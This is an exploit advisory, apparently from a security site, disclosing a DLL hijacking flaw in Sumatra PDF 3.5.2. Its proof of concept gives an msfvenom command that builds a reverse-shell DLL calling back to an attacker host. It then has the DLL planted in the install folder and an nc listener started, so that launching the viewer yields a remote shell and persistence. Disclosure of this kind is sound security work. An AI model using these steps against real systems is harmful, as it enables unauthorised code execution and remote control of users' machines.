Sumatra PDF 3.5.2 DLL Hijacking

2024.02.06
Risk: Medium
Local: Yes
Remote: No
CWE: N/A

# Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking # Date: 06.02.2024 # Exploit Author: Ravishanka Silva # Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader # Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer # Version: 3.5.2 # Tested on: Windows 10, Windows 11 # CVE : CVE-2024-24528 Description: Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files. Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer. A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: dbgcore.DLL profapi.dll PROPSYS.dll TextShaping.dll DWrite.dll Proof of Concept: 1. Create a malicious .dll file via msfvenom, msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL 2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF") 3. Start a listener via nc, nc -lvp 7777 4. Open Sumatra PDF application, and observe the execution of the reverse shell. Demo: https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top